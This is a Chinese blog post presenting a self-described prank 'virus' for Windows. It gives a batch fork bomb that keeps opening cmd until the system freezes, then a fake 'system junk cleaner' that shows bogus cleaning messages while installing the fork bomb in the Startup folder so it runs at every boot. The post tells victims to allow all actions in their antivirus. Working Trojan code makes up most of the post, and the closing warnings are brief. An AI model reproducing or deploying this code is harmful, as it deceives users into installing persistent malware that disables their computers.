最近看了一點bat的知識,具體說是看了一個博客:http://blog.csdn.net/qsyzb/article/details/17364581
用了三天才看完=。=,感覺作者整理整理可以把博客當書買了。。。
然后自己突發其想,想到了一個小病毒程序,其實也算不上病毒,只能算是個惡作劇程序吧,其原理就是不斷打開cmd程序,占用系統資源。。。呵呵。。讓大神見笑了=。=
windows.bat
start cmd %0
用戶打開這個程序之后,程序就會不斷打開cmd,占用系統資源,導致系統癱瘓。%0是再次執行該程序的意思。
但是,這樣只能讓用戶死機一次。。。。重啟系統以后,不再打開這個文件以后,就不再會中招了。。。。。
於是做了優化:
寫了一個系統清理工具(這只是掩飾,嘿嘿,其實我們是要把這個windows.bat寫到用戶的開機自啟動目錄下,達到用戶每次開機,都會運行該程序的目的。但是,也不是不可以解決。。。用戶可以使用pe到開啟啟動目錄把windows.bat文件刪除,或者重裝系統,只測試了xp和win7)
廢話不說了,上代碼:
系統垃圾清理工具:
@echo off title 系統垃圾清理 color 2f echo =====若有殺毒軟件惡意攔截,請選擇【允許程序的所有操作】==== echo. echo. echo start cmd >c:\windows\windows.bat echo %%0>>c:\windows\windows.bat copy c:\windows\windows.bat "%USERPROFILE%\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\">nul if %errorlevel%==0 goto next copy c:\windows\windows.bat "%USERPROFILE%\「開始」菜單\程序\啟動\">nul if %errorlevel%==1 goto error :next echo. echo. echo =====垃圾清理中,請不要關閉窗口========= echo. ping -n 5 127.0.0.1>nul echo. echo =====垃圾清理完畢,共清理垃圾500M======= echo. echo. echo =====建議立即重啟電腦========== pause :error echo. echo. echo ======程序運行失敗,請【使用管理員權限】重新運行!======== echo. pause
首先我們使用echo語句在c:\windows\目錄生成windows.bat文件
然后copy到系統的開機啟動目錄
"%USERPROFILE%\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\"對應win7的系統開機自啟動目錄
"%USERPROFILE%\「開始」菜單\程序\啟動\"對應xp的系統開機目錄
正常情況下應該是有一條拷貝命令可以執行的,如果兩條命令都沒有執行說明,權限不夠,這時提示用戶以管理員權限再次運行。
警示1:
最后,大家收到bat文件的時候,打開之前一定要先用右鍵——記事本打開看看,不然很可能就中招了。。。。
但是,也有很多軟件可以把bat轉exe文件,這樣就看不到代碼了。。。。。。所以,大家不要輕易運行不可信任的程序,可以在沙盒或者虛擬機中先運行試試
警示2:
這個清理系統垃圾的程序,是設定在系統開機的時候發作,所以用戶當時運行完並不知道已經中招了。。病毒有潛伏期,大家需警惕~~